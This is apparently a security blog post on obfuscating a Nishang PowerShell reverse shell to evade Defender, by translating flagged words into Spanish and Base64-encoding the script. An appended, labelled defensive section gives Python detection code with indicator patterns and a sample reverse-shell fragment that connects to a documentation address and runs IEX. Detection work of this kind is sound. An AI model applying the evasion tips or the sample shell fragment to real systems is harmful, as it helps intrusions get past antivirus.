Obfuscating Files
Last updated
To obfuscate a file is to make it obscure, unclear, or unintelligible. A simple example of obfuscation is converting our strings into Base64: this is not encryption and it does not break the functionality of our code, but it is a way to hide our malicious payloads from AVs that scan for malicious strings (AVs are smart, though, and can also decode simple Base64 and scan the real string).
I will work with a simple reverse shell PowerShell script from Nishang.
Saving the file immediately got it flagged.
A little trick I've noticed (this technique is not new): Defender flags a lot of malicious words in English, so what if we change them to Spanish?
Now let's encode the entire script in Base64. PowerShell expects a specific Base64 format, so we need to set these options to apply it to all the text of the script.
We can copy and paste this Base64 blob and it runs correctly.
Demo:
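On the defender's side, the encoding step above is fully reversible by anyone reading process telemetry: PowerShell's `-EncodedCommand` takes the script as UTF-16LE text that is then Base64-encoded, so a detection rule can decode it and inspect the real script instead of the blob. The following Python is an added example, not code from the original post or from Nishang; the command lines and the script fragment are constructed sample data, and the indicator list, regular expressions and function names are my own choices.

```python
import base64
import re

# PowerShell's -EncodedCommand expects Base64 of the script as UTF-16LE text,
# which is the "specific format" the post refers to. Decoding reverses both steps.

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e" plus letters, then a Base64 token of at least 16 characters.
ENCODED_SWITCH = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicators matched against the DECODED script. These are .NET type names and
# cmdlet names, which do not change when variable names are renamed or comments
# are translated into another language.
SCRIPT_INDICATORS = {
    "network_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.IGNORECASE),
    "dynamic_eval": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE),
    "web_download": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest", re.IGNORECASE),
}
# Indicators matched against the raw command line itself.
CMDLINE_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}


def decode_powershell_b64(token: str):
    """Return the script text for an -EncodedCommand token, or None when the token
    is not valid Base64 / UTF-16LE (a decode failure is itself worth reporting)."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Classify one process command line (e.g. from Sysmon Event ID 1 or Security 4688)."""
    result = {"encoded": False, "decoded": None, "indicators": []}
    match = ENCODED_SWITCH.search(cmdline)
    if match is None:
        return result
    result["encoded"] = True
    decoded = decode_powershell_b64(match.group(1))
    result["decoded"] = decoded
    if decoded is None:
        result["indicators"].append("undecodable_payload")
    else:
        result["indicators"] += [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(decoded)]
    result["indicators"] += [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmdline)]
    return result


def find_suspicious(lines) -> list:
    """Indices of command lines that carry an encoded command AND at least one indicator."""
    hits = []
    for i, line in enumerate(lines):
        verdict = analyze_command_line(line)
        if verdict["encoded"] and verdict["indicators"]:
            hits.append(i)
    return hits


def _to_encoded_command(script: str) -> str:
    """Helper to build test input the way PowerShell expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample script fragment used only as detection test data. The variable
# names are Spanish on purpose; the host is a documentation-range address.
SAMPLE_SCRIPT = '$cliente = New-Object System.Net.Sockets.TCPClient("192.0.2.10", 4444); IEX $datos'

# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\notepad.exe" C:\Users\alice\notes.txt',
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    'powershell.exe -nop -w hidden -enc ' + _to_encoded_command(SAMPLE_SCRIPT),
    'powershell.exe -e ' + _to_encoded_command('Write-Host "hola"'),
    'powershell.exe -enc bm90LXZhbGlkLWJhc2U2NA',  # malformed token: bad padding
]

if __name__ == "__main__":
    for i in find_suspicious(SAMPLE_COMMAND_LINES):
        verdict = analyze_command_line(SAMPLE_COMMAND_LINES[i])
        print(f"[{i}] indicators={verdict['indicators']} decoded={verdict['decoded']!r}")
```

The indicators are deliberately .NET type names and cmdlet names rather than English words in comments or variable names, so renaming `$client` to `$cliente` or translating the comments, as in the Spanish trick above, does not change what the rule sees. A token that claims to be an encoded command but fails to decode is reported rather than silently skipped, because that combination is itself unusual in normal administration.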